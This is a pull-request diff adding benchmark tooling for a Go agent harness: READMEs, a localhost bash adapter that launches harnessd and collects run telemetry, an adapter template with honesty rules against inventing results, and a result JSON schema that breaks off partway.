### PR TITLE
Runtime validation suite: reliability, isolation, forensics, autonomy, proof

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -26,6 +26,7 @@ __pycache__/
 *.py[cod]
 
 # Compiled binaries (root-level)
+/forensics
 /harnesscli
 /harnessd
 /symphd

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -43,6 +43,13 @@ and error recovery chains.
 - OpenAI is the primary provider path.
 - Anthropic provider support exists in the provider catalog and should not be described as merely planned.
 
+## Benchmarks
+
+- `benchmarks/` and `harness_agent/` are Python (not Go). They need external pip deps (`terminal_bench`, `harbor`) that are not vendored here.
+- Key-free deterministic smoke: `go test ./internal/server/... -run TestRunSmoke` (no key, no Docker).
+- Shell smoke: `bash scripts/run-bench-smoke.sh` (builds harnessd, uses `HARNESS_PROVIDER=fake`).
+- Full benchmark runbook (smokes, result schema, comparison harness, Python paths, honesty caveats): `docs/runbooks/benchmark-smoke.md`.
+
 ## Operational Reminder
 
 - Keep `docs/logs/long-term-thinking-log.md` in sync with any durable intent or success-criteria changes.

--- a/benchmarks/README.md
+++ b/benchmarks/README.md
@@ -1,0 +1,95 @@
+# benchmarks/
+
+This directory contains two separate benchmark harnesses for go-agent-harness. Neither is a Go package — both are Python and require external Python dependencies.
+
+---
+
+## 1. terminal_bench/ — Terminal-Bench private task suite
+
+Custom tasks for the [Terminal-Bench](https://github.com/terminal-bench/terminal-bench) framework.
+`agent.py` (the `GoAgentHarnessAgent` class) implements the `BaseAgent` interface from the
+`terminal_bench` Python package.
+
+### What it does
+
+- Packages this repo as a tar archive and copies it into the Terminal-Bench container.
+- Cross-compiles `harnessd` and `harnesscli` for linux/amd64 or linux/arm64 (via `go build`).
+- Starts `harnessd` inside the container via tmux, runs the task via `harnesscli`, and fetches
+  telemetry from the `/v1/runs/{id}/summary` endpoint.
+- Includes 7 custom Go coding tasks under `terminal_bench/tasks/`:
+  - `go-interface-migration` — implement missing interface methods
+  - `go-race-condition-fix` — fix a concurrent data race
+  - `go-rename-refactor` — rename/refactor across a package
+  - `go-retry-schedule-fix` — fix retry/scheduling logic
+  - `incident-summary-shell` — shell-based incident summarizer
+  - `multi-report-pipeline` — multi-step shell pipeline
+  - `staging-deploy-docs` — documentation generation task
+
+### Python dependencies
+
+The `terminal_bench` package is an **external pip package** (not vendored here). There is no
+`requirements.txt` or `pyproject.toml` in this directory — the dependency must be installed
+manually:
+
+```bash
+pip install terminal-bench
+```
+
+**Honesty note:** `terminal_bench` and its transitive dependencies (`terminal_bench.agents`,
+`terminal_bench.terminal.tmux_session`, etc.) are **not installed in this development
+environment** and cannot be imported (`ModuleNotFoundError: No module named 'terminal_bench'`).
+The intended commands below are documented from reading the source; they have **not been
+end-to-end executed** in this environment.
+
+### Entry point (intended — not verified here)
+
+Run from the **project root** so that `benchmarks/` is on the Python path:
+
+```bash
+# Example: run the go-interface-migration task with terminal-bench
+terminal-bench run \
+  --agent benchmarks.terminal_bench.agent:GoAgentHarnessAgent \
+  --task go-interface-migration
+```
+
+Or follow the Terminal-Bench framework docs for how to register custom tasks and agents.
+
+### Required environment variables
+
+| Variable | Required | Description |
+|---|---|---|
+| `OPENAI_API_KEY` | Yes (default) | OpenAI API key for the LLM backend |
+| `OPENAI_BASE_URL` | No | Override for OpenAI-compatible base URL |
+| `HARNESS_BENCH_MODEL` | No | Model name (default: `gpt-5-mini`) |
+| `HARNESS_BENCH_MAX_STEPS` | No | Max harness steps per run (default: `100`) |
+| `HARNESS_BENCH_MEMORY_MODE` | No | Memory mode (default: `off`) |
+| `HARNESS_BENCH_TARGET_ARCH` | No | Linux target arch: `amd64` or `arm64` (auto-detected) |
+
+**Note:** The default model hardcoded in `agent.py` is `gpt-5-mini`. The `baseline.json` file
+contains illustrative/sample baseline values (attributed in its `_comment` to a run named
+`full-final-20260308-005332`, but no archived run data exists in this repo to verify that
+provenance). Treat the numbers as sample expectations, not as verified historical measurements.
+
+### Docker
+
+Each task has a `Dockerfile` and `docker-compose.yaml`. The base image is defined in
+`terminal_bench/Dockerfile.base` (based on `golang:1.22-bookworm`). These are used by the
+Terminal-Bench framework — you do not need to build them directly.
+
+---
+
+## 2. overnight-tasks/ — Overnight training task lists
+
+Plain-text task tables used by `scripts/overnight-training.sh`. These are **not Python** — they
+are shell-script data files sourced by the overnight training loop.
+
+See `overnight-tasks/README.md` for format, difficulty tiers, and output paths.
+
+---
+
+## What is NOT here
+
+- No `requirements.txt` or `pyproject.toml` — Python dependencies are undeclared and must be
+  installed manually based on the imports in each agent file.
+- No top-level entry-point script for `benchmarks/` — each sub-harness has its own mechanism.
+- `benchmarks/__init__.py` exists only to make the directory importable as a Python package.

--- a/benchmarks/comparison/README.md
+++ b/benchmarks/comparison/README.md
@@ -1,0 +1,133 @@
+# benchmarks/comparison/
+
+Comparison harness **shape** for go-code.
+
+This directory defines the structural framework for running go-code alongside
+other tools on a shared task set. **No competitor tools are built or
+configured here.** No head-to-head numbers are asserted. The framework exists
+so an operator can fill in entrants and run an honest comparison.
+
+---
+
+## What is here
+
+| File | Purpose |
+|---|---|
+| `tools.json` | Entrant registry. go-code is fully specified; all other entrants are commented stubs in `_stub_entrants_not_active`. |
+| `result.schema.json` | JSON Schema for one result record. Mirrors `internal/benchresult.BenchmarkResult` fields plus adapter-added fields (`tool_id`, `task_id`, `git_sha`) and the external oracle field (`is_resolved`). |
+| `adapters/template.sh` | Documents the adapter I/O contract. Copy and implement for each entrant. |
+| `adapters/go-code.sh` | Real adapter wrapping the go-code run API. |
+| `run.sh` | Env-driven orchestrator: iterates entrants × tasks, writes `results.jsonl` and a report. |
+
+---
+
+## What is NOT here
+
+- **No competitor adapters.** `_stub_entrants_not_active` in `tools.json` are
+  placeholders. Move one into the active `entrants` array and write its
+  adapter before running it.
+- **No head-to-head numbers.** No accuracy comparisons are made by this
+  harness. The report only records adapter success/failure counts.
+- **No task pass/fail.** `is_resolved` (task pass/fail) is an **external**
+  field from the pytest oracle (terminal-bench or equivalent). The harness
+  API only reports `completed`/`failed` — meaning the harness finished, not
+  that the agent solved the task. Merge oracle results separately.
+
+---
+
+## Honesty rules
+
+These are non-negotiable when using this harness:
+
+1. **`is_resolved` must come from an external oracle.** Never set it in an
+   adapter from a heuristic or guess. The harness has no task-level
+   pass/fail signal — it only knows if the run ended.
+2. **Do not invent metrics.** `duration_ms` is derived from timestamps;
+   `cost_status` reflects the harness value. If a field is unknown, leave it
+   absent or use the zero value.
+3. **Record provenance.** `run-env.json` captures the git SHA, model, and
+   task set used. Always keep it with the `results.jsonl`.
+4. **Mark derived vs. raw.** Fields annotated DERIVED/RECONSTRUCTED/EXTERNAL
+   in `result.schema.json` are not raw API fields — treat them as such.
+
+---
+
+## Quick start
+
+### Key-free smoke (go-code only, fake provider)
+
+Requires: `harnessd` built; `HARNESS_PROVIDER=fake`; a turns JSON file.
+
+```bash
+# Build harnessd first
+go build -o harnessd ./cmd/harnessd
+
+# Create a minimal task set
+mkdir -p /tmp/tasks/hello
+echo "Reply with: HELLO_OK" > /tmp/tasks/hello/prompt.txt
+
+# Run the comparison harness with the fake provider
+TASK_SET_DIR=/tmp/tasks \
+MODEL=fake-model \
+HARNESS_PROVIDER=fake \
+HARNESS_FAKE_TURNS=/path/to/turns.json \
+  bash benchmarks/comparison/run.sh
+```
+
+### Real provider run (go-code only)
+
+```bash
+export OPENAI_API_KEY=sk-...
+
+TASK_SET_DIR=/path/to/terminal_bench/tasks \
+MODEL=gpt-4.1-mini \
+  bash benchmarks/comparison/run.sh
+```
+
+### Adding a competitor
+
+1. Copy `adapters/template.sh` to `adapters/<tool-id>.sh`.
+2. Implement the adapter body following the contract documented in the
+   template (env inputs: `TASK_DIR`, `WORKSPACE`, `PROMPT`, `MODEL`,
+   `RESULT_JSON`, `TASK_ID`, `TOOL_ID`; exit 0 on success, 1 on infra error).
+3. In `tools.json`, move the stub from `_stub_entrants_not_active` into the
+   `entrants` array (or add a new entry). Fill in `adapter`, `key_env`, etc.
+4. Make the adapter executable: `chmod +x adapters/<tool-id>.sh`.
+5. Run as above with `ENTRANT_IDS="go-code <tool-id>"`.
+
+---
+
+## Result schema
+
+Each row in `results.jsonl` conforms to `result.schema.json`. Key fields:
+
+| Field | Source | Notes |
+|---|---|---|
+| `run_id` | RunSummary.RunID | Harness-assigned UUID |
+| `status` | RunSummary.Status | `completed` or `failed` — harness status, NOT task pass/fail |
+| `steps_taken` | RunSummary.StepsTaken | LLM turns |
+| `total_prompt_tokens` | RunSummary.TotalPromptTokens | |
+| `total_completion_tokens` | RunSummary.TotalCompletionTokens | |
+| `total_cost_usd` | RunSummary.TotalCostUSD | |
+| `duration_ms` | **DERIVED** | UpdatedAt − CreatedAt in ms |
+| `rollout_path` | **RECONSTRUCTED** | Empty unless caller supplies rolloutDir |
+| `is_resolved` | **EXTERNAL** | From pytest oracle only — never from adapter |
+| `drift` | **EXTERNAL/opt-in** | From drift-analysis oracle |
+| `forensic_events` | **EXTERNAL/opt-in** | From rollout JSONL loader |
+
+---
+
+## Environment variables reference
+
+| Variable | Required | Default | Description |
+|---|---|---|---|
+| `TASK_SET_DIR` | Yes | — | Directory of task subdirectories |
+| `MODEL` | Yes | — | Model name (e.g. `gpt-4.1-mini`) |
+| `ENTRANT_IDS` | No | all active | Space-separated IDs to run |
+| `OUTPUT_DIR` | No | `.tmp/comparison/<ts>` | Results output directory |
+| `HARNESS_PROVIDER` | No | — | Set to `fake` for key-free mode |
+| `HARNESS_FAKE_TURNS` | No | — | Turns JSON for fake provider |
+| `HARNESS_BINARY` | No | `harnessd` | Path to harnessd binary |
+| `HARNESS_ADDR` | No | `:8081` | Harnessd listen address |
+| `POLL_TIMEOUT_S` | No | `300` | Per-run poll timeout (seconds) |
+| `OPENAI_API_KEY` | Conditional | — | Required unless using fake provider |

--- a/benchmarks/comparison/adapters/go-code.sh
+++ b/benchmarks/comparison/adapters/go-code.sh
@@ -1,0 +1,371 @@
+#!/usr/bin/env bash
+# adapters/go-code.sh — Adapter for go-agent-harness (go-code).
+#
+# Wraps the harness run API:
+#   1. Start harnessd (or reuse a running instance).
+#   2. POST /v1/runs with the task prompt.
+#   3. Poll GET /v1/runs/{id} until terminal status.
+#   4. GET /v1/runs/{id}/summary for telemetry.
+#   5. Build RESULT_JSON from the run + summary responses.
+#
+# KEY-FREE SMOKE MODE:
+#   HARNESS_PROVIDER=fake  — use the fakeprovider path (PC1 in issue5-plan).
+#   HARNESS_FAKE_TURNS     — path to a turns JSON file for scripted responses.
+#   When both are set, no API key is required.
+#
+# ENVIRONMENT INPUTS (set by run.sh per adapter contract in adapters/template.sh):
+#   TASK_DIR      Absolute path to task directory.
+#   WORKSPACE     Per-run scratch directory.
+#   PROMPT        Task prompt text.
+#   MODEL         Model name to use (e.g. "gpt-4.1-mini").
+#   RESULT_JSON   Path where this adapter must write the result record.
+#   TASK_ID       Task identifier (included in result).
+#   TOOL_ID       Entrant ID ("go-code" — included in result).
+#
+# ADDITIONAL ENVIRONMENT (optional, adapter-specific):
+#   HARNESS_BINARY        Path to harnessd binary (default: harnessd on PATH).
+#   HARNESS_ADDR          Listen address for harnessd (default: :8081 to avoid
+#                         colliding with a dev server on :8080).
+#   HARNESS_PROVIDER      Provider name ("fake" for key-free mode).
+#   HARNESS_FAKE_TURNS    Path to fake-turns JSON (used with HARNESS_PROVIDER=fake).
+#   OPENAI_API_KEY        Required unless HARNESS_PROVIDER=fake.
+#   HARNESS_AUTH_DISABLED Set to "true" if server has auth disabled (default: true
+#                         for benchmark runs on localhost).
+#   POLL_INTERVAL_S       Seconds between status polls (default: 2).
+#   POLL_TIMEOUT_S        Max seconds to wait for run completion (default: 300).
+
+set -euo pipefail
+
+# ---------------------------------------------------------------------------
+# Validate required contract inputs
+# ---------------------------------------------------------------------------
+: "${TASK_DIR:?TASK_DIR must be set by run.sh}"
+: "${WORKSPACE:?WORKSPACE must be set by run.sh}"
+: "${PROMPT:?PROMPT must be set by run.sh}"
+: "${MODEL:?MODEL must be set by run.sh}"
+: "${RESULT_JSON:?RESULT_JSON must be set by run.sh}"
+: "${TASK_ID:?TASK_ID must be set by run.sh}"
+: "${TOOL_ID:?TOOL_ID must be set by run.sh}"
+
+# ---------------------------------------------------------------------------
+# Configuration
+# ---------------------------------------------------------------------------
+HARNESS_BINARY="${HARNESS_BINARY:-harnessd}"
+HARNESS_ADDR="${HARNESS_ADDR:-:8081}"
+POLL_INTERVAL_S="${POLL_INTERVAL_S:-2}"
+POLL_TIMEOUT_S="${POLL_TIMEOUT_S:-300}"
+
+PORT="${HARNESS_ADDR##*:}"
+BASE_URL="http://127.0.0.1:${PORT}"
+
+LOG_FILE="${WORKSPACE}/harnessd.log"
+PID_FILE="${WORKSPACE}/harnessd.pid"
+STARTED_BY_US=0
+SERVER_PID=""
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+info() { printf '[go-code-adapter] %s\n' "$*" >&2; }
+die()  { printf '[go-code-adapter] ERROR: %s\n' "$*" >&2; exit 1; }
+
+# Prefer jq for JSON extraction; fall back to python3.
+json_field() {
+  local json="$1" field="$2"
+  if command -v jq &>/dev/null; then
+    printf '%s' "$json" | jq -r --arg f "$field" '.[$f] // empty'
+  else
+    printf '%s' "$json" | python3 -c "
+import json, sys
+data = json.load(sys.stdin)
+print(data.get('$field', ''))
+"
+  fi
+}
+
+json_field_num() {
+  local json="$1" field="$2" default="${3:-0}"
+  if command -v jq &>/dev/null; then
+    printf '%s' "$json" | jq -r --arg f "$field" --argjson d "$default" '.[$f] // $d'
+  else
+    printf '%s' "$json" | python3 -c "
+import json, sys
+data = json.load(sys.stdin)
+val = data.get('$field')
+print(val if val is not None else $default)
+"
+  fi
+}
+
+# ---------------------------------------------------------------------------
+# Server lifecycle
+# ---------------------------------------------------------------------------
+stop_server() {
+  if [[ "$STARTED_BY_US" -ne 1 ]]; then
+    return 0
+  fi
+  if [[ -z "$SERVER_PID" ]]; then
+    return 0
+  fi
+  if ! kill -0 "$SERVER_PID" 2>/dev/null; then
+    return 0
+  fi
+  info "stopping harnessd (pid=${SERVER_PID})"
+  kill "$SERVER_PID" 2>/dev/null || true
+  local waited=0
+  while kill -0 "$SERVER_PID" 2>/dev/null && [[ $waited -lt 25 ]]; do
+    sleep 0.2
+    waited=$(( waited + 1 ))
+  done
+  if kill -0 "$SERVER_PID" 2>/dev/null; then
+    kill -9 "$SERVER_PID" 2>/dev/null || true
+  fi
+}
+trap stop_server EXIT
+
+start_server() {
+  if ! command -v "$HARNESS_BINARY" &>/dev/null; then
+    die "harnessd binary not found: ${HARNESS_BINARY}. Build with: go build -o harnessd ./cmd/harnessd"
+  fi
+
+  info "starting harnessd on ${HARNESS_ADDR} (log: ${LOG_FILE})"
+
+  HARNESS_ADDR="${HARNESS_ADDR}" \
+  HARNESS_AUTH_DISABLED="${HARNESS_AUTH_DISABLED:-true}" \
+  "${HARNESS_BINARY}" \
+    >"${LOG_FILE}" 2>&1 &
+  SERVER_PID=$!
+  echo "$SERVER_PID" > "$PID_FILE"
+  STARTED_BY_US=1
+
+  info "waiting for /healthz (pid=${SERVER_PID})..."
+  local waited=0
+  while ! curl -sf "${BASE_URL}/healthz" >/dev/null 2>&1; do
+    sleep 0.5
+    waited=$(( waited + 1 ))
+    if [[ $waited -ge 20 ]]; then
+      die "harnessd did not become healthy within 10s. See log: ${LOG_FILE}"
+    fi
+    if ! kill -0 "$SERVER_PID" 2>/dev/null; then
+      die "harnessd process (pid=${SERVER_PID}) died before becoming healthy. See log: ${LOG_FILE}"
+    fi
+  done
+  info "harnessd ready at ${BASE_URL}"
+}
+
+# ---------------------------------------------------------------------------
+# Ensure a server is running
+# ---------------------------------------------------------------------------
+if curl -sf "${BASE_URL}/healthz" >/dev/null 2>&1; then
+  info "reusing existing harnessd at ${BASE_URL}"
+else
+  start_server
+fi
+
+# ---------------------------------------------------------------------------
+# Record git SHA for reproducibility (best-effort)
+# ---------------------------------------------------------------------------
+GIT_SHA=""
+if command -v git &>/dev/null; then
+  GIT_SHA="$(git -C "$(dirname "${BASH_SOURCE[0]}")/../../.." rev-parse --short HEAD 2>/dev/null || true)"
+fi
+
+# ---------------------------------------------------------------------------
+# Build POST /v1/runs payload
+# ---------------------------------------------------------------------------
+if command -v jq &>/dev/null; then
+  RUN_PAYLOAD="$(jq -n \
+    --arg prompt "$PROMPT" \
+    --arg model  "$MODEL" \
+    '{prompt: $prompt, model: $model, allow_fallback: true}')"
+else
+  RUN_PAYLOAD="$(python3 -c "
+import json, sys
+print(json.dumps({'prompt': sys.argv[1], 'model': sys.argv[2], 'allow_fallback': True}))
+" "$PROMPT" "$MODEL")"
+fi
+
+# ---------------------------------------------------------------------------
+# POST /v1/runs
+# ---------------------------------------------------------------------------
+info "POST ${BASE_URL}/v1/runs (model=${MODEL})"
+RUN_RESPONSE="$(curl -sf -X POST \
+  -H "Content-Type: application/json" \
+  -d "$RUN_PAYLOAD" \
+  "${BASE_URL}/v1/runs")" || die "POST /v1/runs failed"
+
+RUN_ID="$(json_field "$RUN_RESPONSE" "id")"
+if [[ -z "$RUN_ID" ]]; then
+  # Some server versions use run_id instead of id
+  RUN_ID="$(json_field "$RUN_RESPONSE" "run_id")"
+fi
+if [[ -z "$RUN_ID" ]]; then
+  die "POST /v1/runs did not return an id. Response: ${RUN_RESPONSE}"
+fi
+info "run started: ${RUN_ID}"
+
+# ---------------------------------------------------------------------------
+# Poll for completion
+# ---------------------------------------------------------------------------
+info "polling for completion (timeout=${POLL_TIMEOUT_S}s)..."
+ELAPSED=0
+RUN_STATUS=""
+FINAL_RUN_JSON=""
+while true; do
+  FINAL_RUN_JSON="$(curl -sf "${BASE_URL}/v1/runs/${RUN_ID}" || echo '{}')"
+  RUN_STATUS="$(json_field "$FINAL_RUN_JSON" "status")"
+
+  case "$RUN_STATUS" in
+    completed|failed|cancelled)
+      info "run ${RUN_ID} reached status: ${RUN_STATUS}"
+      break
+      ;;
+  esac
+
+  ELAPSED=$(( ELAPSED + POLL_INTERVAL_S ))
+  if [[ $ELAPSED -ge $POLL_TIMEOUT_S ]]; then
+    info "WARNING: run ${RUN_ID} did not complete within ${POLL_TIMEOUT_S}s (last status: ${RUN_STATUS}). Writing partial result."
+    RUN_STATUS="failed"
+    break
+  fi
+  info "  status=${RUN_STATUS}, elapsed=${ELAPSED}s"
+  sleep "$POLL_INTERVAL_S"
+done
+
+# ---------------------------------------------------------------------------
+# GET /v1/runs/{id}/summary
+# ---------------------------------------------------------------------------
+SUMMARY_JSON=""
+if [[ "$RUN_STATUS" == "completed" || "$RUN_STATUS" == "failed" ]]; then
+  SUMMARY_JSON="$(curl -sf "${BASE_URL}/v1/runs/${RUN_ID}/summary" 2>/dev/null || echo '{}')"
+fi
+
+# ---------------------------------------------------------------------------
+# Build RESULT_JSON
+#
+# Fields sourced from FINAL_RUN_JSON (Run struct):
+#   model, provider_name, prompt, output, tenant_id, conversation_id, agent_id,
+#   created_at, updated_at
+#
+# Fields sourced from SUMMARY_JSON (RunSummary struct):
+#   run_id, status, steps_taken, total_prompt_tokens, total_completion_tokens,
+#   total_cost_usd, cost_status, cache_hit_rate, error_message, tool_calls
+#
+# DERIVED fields (computed here):
+#   duration_ms = (updated_at − created_at) in ms  [python computes this]
+#
+# EXTERNAL fields (not set by adapter):
+#   is_resolved, drift, forensic_events, rollout_path
+#
+# Adapter-added fields:
+#   tool_id, task_id, git_sha
+# ---------------------------------------------------------------------------
+info "building result record at ${RESULT_JSON}"
+
+python3 - <<PYEOF
+import json, sys, os
+from datetime import datetime, timezone
+
+run_json    = json.loads("""${FINAL_RUN_JSON}""")
+summary_json = json.loads("""${SUMMARY_JSON:-{}}""")
+
+# --- Identity ---
+run_id = summary_json.get("run_id") or run_json.get("id") or run_json.get("run_id") or "${RUN_ID}"
+
+# --- Status (from summary if available, else from run) ---
+status = summary_json.get("status") or run_json.get("status") or "${RUN_STATUS}"
+
+# --- Counters from RunSummary ---
+steps_taken             = int(summary_json.get("steps_taken") or 0)
+total_prompt_tokens     = int(summary_json.get("total_prompt_tokens") or 0)
+total_completion_tokens = int(summary_json.get("total_completion_tokens") or 0)
+total_cost_usd          = float(summary_json.get("total_cost_usd") or 0.0)
+cost_status             = summary_json.get("cost_status") or "provider_unreported"
+cache_hit_rate          = float(summary_json.get("cache_hit_rate") or 0.0)
+error_message           = summary_json.get("error") or run_json.get("error") or ""
+
+# --- Tool calls from RunSummary ---
+raw_tool_calls = summary_json.get("tool_calls") or []
+tool_calls = [
+    {"tool_name": tc.get("tool_name", ""), "step": int(tc.get("step", 0))}
+    for tc in raw_tool_calls
+]
+
+# --- Run identity (from Run struct) ---
+model         = run_json.get("model") or "${MODEL}"
+provider_name = run_json.get("provider_name") or ""
+prompt        = run_json.get("prompt") or "${PROMPT}"
+output        = run_json.get("output") or ""
+tenant_id     = run_json.get("tenant_id") or ""
+conversation_id = run_json.get("conversation_id") or ""
+agent_id      = run_json.get("agent_id") or ""
+
+# --- Timestamps (source: Run) ---
+created_at_str = run_json.get("created_at") or ""
+updated_at_str = run_json.get("updated_at") or ""
+
+# --- DERIVED: duration_ms ---
+duration_ms = 0
+if created_at_str and updated_at_str:
+    try:
+        # RFC3339 with possible fractional seconds
+        def parse_ts(s):
+            s = s.rstrip("Z")
+            for fmt in ("%Y-%m-%dT%H:%M:%S.%f", "%Y-%m-%dT%H:%M:%S"):
+                try:
+                    return datetime.strptime(s, fmt).replace(tzinfo=timezone.utc)
+                except ValueError:
+                    continue
+            return None
+        t_created = parse_ts(created_at_str)
+        t_updated = parse_ts(updated_at_str)
+        if t_created and t_updated:
+            duration_ms = int((t_updated - t_created).total_seconds() * 1000)
+    except Exception:
+        pass
+
+result = {
+    "tool_id":                  "${TOOL_ID}",
+    "task_id":                  "${TASK_ID}",
+    "run_id":                   run_id,
+    "status":                   status,
+    "steps_taken":              steps_taken,
+    "total_prompt_tokens":      total_prompt_tokens,
+    "total_completion_tokens":  total_completion_tokens,
+    "total_cost_usd":           total_cost_usd,
+    "cost_status":              cost_status,
+    "cache_hit_rate":           cache_hit_rate,
+    "model":                    model,
+    "prompt":                   prompt,
+    "created_at":               created_at_str,
+    "updated_at":               updated_at_str,
+    "duration_ms":              duration_ms,
+    "tool_calls":               tool_calls,
+}
+
+# Optional fields — only include when non-empty
+if error_message:
+    result["error_message"] = error_message
+if output:
+    result["output"] = output
+if provider_name:
+    result["provider_name"] = provider_name
+if tenant_id:
+    result["tenant_id"] = tenant_id
+if conversation_id:
+    result["conversation_id"] = conversation_id
+if agent_id:
+    result["agent_id"] = agent_id
+if "${GIT_SHA:-}":
+    result["git_sha"] = "${GIT_SHA}"
+
+# is_resolved, drift, forensic_events, rollout_path are EXTERNAL — NOT set here.
+
+with open("${RESULT_JSON}", "w") as f:
+    json.dump(result, f, indent=2)
+    f.write("\n")
+
+print(f"[go-code-adapter] wrote result: status={status}, run_id={run_id}")
+PYEOF
+
+info "adapter complete: ${RESULT_JSON}"

--- a/benchmarks/comparison/adapters/template.sh
+++ b/benchmarks/comparison/adapters/template.sh
@@ -1,0 +1,91 @@
+#!/usr/bin/env bash
+# adapters/template.sh — Adapter I/O contract documentation.
+#
+# This file is a TEMPLATE. It documents the interface every adapter must
+# implement. Copy it to adapters/<tool-id>.sh and implement the body.
+#
+# ---------------------------------------------------------------------------
+# CONTRACT: Environment inputs (set by run.sh before invoking the adapter)
+# ---------------------------------------------------------------------------
+#
+#   TASK_DIR      Absolute path to the task directory for this run.
+#                 The adapter reads the task prompt from here.
+#                 Convention: a file named "prompt.txt" or "task.md" holds
+#                 the user-visible prompt. Adapter decides how to read it.
+#
+#   WORKSPACE     Absolute path to a fresh per-run scratch directory the
+#                 tool may use for intermediate files. Created by run.sh
+#                 before calling the adapter; cleaned up by run.sh after.
+#
+#   PROMPT        The task prompt text (already read from TASK_DIR by
+#                 run.sh). Adapters MAY use this directly instead of
+#                 re-reading TASK_DIR, but must not modify it.
+#
+#   MODEL         Model name the adapter should use (e.g. "gpt-4.1-mini").
+#                 If the tool does not support model selection, ignore it
+#                 and document the fixed model in the entrant's tools.json
+#                 entry.
+#
+#   RESULT_JSON   Absolute path where the adapter MUST write one JSON
+#                 result record conforming to result.schema.json.
+#                 The file must be valid JSON when the adapter exits 0.
+#                 run.sh reads this file and appends it to the run report.
+#
+#   TASK_ID       Task identifier string (basename of TASK_DIR by default;
+#                 run.sh may set it from a task manifest). The adapter must
+#                 include this value as the "task_id" field in RESULT_JSON.
+#
+#   TOOL_ID       Entrant ID string (from tools.json). The adapter must
+#                 include this value as the "tool_id" field in RESULT_JSON.
+#
+# ---------------------------------------------------------------------------
+# CONTRACT: Exit code
+# ---------------------------------------------------------------------------
+#
+#   0   The adapter ran successfully. RESULT_JSON must exist and be valid.
+#       A status=failed run (the tool errored) is still exit 0 — the
+#       failure is recorded inside RESULT_JSON, not via the exit code.
+#
+#   1   The adapter itself failed to run (infrastructure error: binary not
+#       found, API unreachable, timeout, RESULT_JSON not written).
+#       run.sh will record a synthetic error result for this task.
+#
+# ---------------------------------------------------------------------------
+# CONTRACT: RESULT_JSON content
+# ---------------------------------------------------------------------------
+#
+#   Must be a single JSON object matching result.schema.json.
+#   Required fields: run_id, status, steps_taken, total_prompt_tokens,
+#   total_completion_tokens, total_cost_usd, cost_status, cache_hit_rate,
+#   model, prompt, created_at, updated_at, duration_ms, tool_calls,
+#   tool_id, task_id.
+#
+#   HONESTY RULES (non-negotiable):
+#   - "is_resolved" MUST NOT be set by the adapter. It is EXTERNAL — it
+#     comes from the pytest oracle merged in by run.sh or post-processing.
+#     Writing a made-up value here will corrupt benchmark results.
+#   - "drift" and "forensic_events" are EXTERNAL/opt-in. Leave them absent
+#     unless populated by an external oracle.
+#   - "duration_ms" is DERIVED (updated_at − created_at milliseconds).
+#     Compute it from the actual timestamps; do not invent it.
+#   - "cost_status" must reflect the harness value, not be invented.
+#     If the tool does not report costs, set cost_status="provider_unreported"
+#     and total_cost_usd=0.
+#
+# ---------------------------------------------------------------------------
+# TEMPLATE BODY (replace everything below with real implementation)
+# ---------------------------------------------------------------------------
+
+set -euo pipefail
+
+: "${TASK_DIR:?TASK_DIR must be set}"
+: "${WORKSPACE:?WORKSPACE must be set}"
+: "${PROMPT:?PROMPT must be set}"
+: "${MODEL:?MODEL must be set}"
+: "${RESULT_JSON:?RESULT_JSON must be set}"
+: "${TASK_ID:?TASK_ID must be set}"
+: "${TOOL_ID:?TOOL_ID must be set}"
+
+echo "[template] ERROR: This is a template. Implement a real adapter." >&2
+echo "[template] Copy this file to adapters/<tool-id>.sh and fill in the body." >&2
+exit 1

--- a/benchmarks/comparison/result.schema.json
+++ b/benchmarks/comparison/result.schema.json
@@ -1,0 +1,180 @@
+{
+  "$schema": "http://json-schema.org/draft-07/schema#",
+  "$id": "benchmarks/comparison/result.schema.json",
+  "title": "BenchmarkResult",
+  "description": "One result record per (tool, task) pair. Mirrors internal/benchresult.BenchmarkResult fields plus adapter-added fields (tool_id, task_id, git_sha) and external oracle fields (is_resolved). Fields are annotated to their real source. No invented fields. task pass/fail (is_resolved) is EXTERNAL — it comes from the pytest oracle, NOT from the harness API.",
+  "type": "object",
+  "required": [
+    "run_id",
+    "status",
+    "steps_taken",
+    "total_prompt_tokens",
+    "total_completion_tokens",
+    "total_cost_usd",
+    "cost_status",
+    "cache_hit_rate",
+    "model",
+    "prompt",
+    "created_at",
+    "updated_at",
+    "duration_ms",
+    "tool_calls",
+    "tool_id",
+    "task_id"
+  ],
+  "properties": {
+    "tool_id": {
+      "type": "string",
+      "description": "Entrant ID from tools.json (e.g. 'go-code'). Added by the adapter."
+    },
+    "task_id": {
+      "type": "string",
+      "description": "Task identifier (e.g. 'go-interface-migration'). Added by the adapter from TASK_DIR basename or TASK_ID env var."
+    },
+    "run_id": {
+      "type": "string",
+      "description": "Source: benchresult.BenchmarkResult.RunID = RunSummary.RunID = Run.ID."
+    },
+    "status": {
+      "type": "string",
+      "enum": ["completed", "failed", "queued", "running", "cancelled"],
+      "description": "Terminal run status. Source: RunSummary.Status (harness.RunStatus). 'completed' means the harness finished — NOT that the task was solved."
+    },
+    "steps_taken": {
+      "type": "integer",
+      "minimum": 0,
+      "description": "Number of LLM turns before run ended. Source: RunSummary.StepsTaken."
+    },
+    "total_prompt_tokens": {
+      "type": "integer",
+      "minimum": 0,
+      "description": "Cumulative input-token count across all turns. Source: RunSummary.TotalPromptTokens."
+    },
+    "total_completion_tokens": {
+      "type": "integer",
+      "minimum": 0,
+      "description": "Cumulative output-token count across all turns. Source: RunSummary.TotalCompletionTokens."
+    },
+    "total_cost_usd": {
+      "type": "number",
+      "minimum": 0,
+      "description": "Total run cost in USD. Source: RunSummary.TotalCostUSD."
+    },
+    "cost_status": {
+      "type": "string",
+      "description": "Pricing confidence level (e.g. 'available', 'unpriced_model', 'provider_unreported'). Source: RunSummary.CostStatus."
+    },
+    "cache_hit_rate": {
+      "type": "number",
+      "minimum": 0,
+      "maximum": 1,
+      "description": "Fraction of prompt tokens served from cache [0,1]. Source: RunSummary.CacheHitRate."
+    },
+    "error_message": {
+      "type": "string",
+      "description": "Non-empty only when status == 'failed'. Source: RunSummary.Error."
+    },
+    "model": {
+      "type": "string",
+      "description": "Model name used for this run (e.g. 'gpt-4.1-mini'). Source: Run.Model."
+    },
+    "provider_name": {
+      "type": "string",
+      "description": "Resolved provider key (e.g. 'openai', 'anthropic'). Source: Run.ProviderName."
+    },
+    "prompt": {
+      "type": "string",
+      "description": "Task prompt submitted to the agent. Source: Run.Prompt."
+    },
+    "output": {
+      "type": "string",
+      "description": "Final agent response text. Source: Run.Output."
+    },
+    "tenant_id": {
+      "type": "string",
